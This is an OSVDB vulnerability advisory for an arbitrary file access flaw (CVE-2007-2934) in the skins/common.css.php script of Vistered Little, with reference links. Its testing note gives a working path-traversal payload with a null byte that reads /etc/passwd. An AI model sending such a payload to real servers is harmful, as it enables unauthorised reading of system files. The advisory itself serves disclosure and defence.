Vistered Little skins/common.css.php skin Variable Traversal Arbitrary File Access

2007-05-28T00:00:00
ID OSVDB:38350
Type osvdb
Reporter OSVDB
Modified 2007-05-28T00:00:00

Description

Manual Testing Notes

[path]/skins/common.css.php?skin=../../../../../../etc/passwd%00

References:

Mail List Post: http://www.attrition.org/pipermail/vim/2007-May/001632.html ISS X-Force ID: 34546 Generic Exploit URL: http://www.milw0rm.com/exploits/3999 CVE-2007-2934 Bugtraq ID: 24178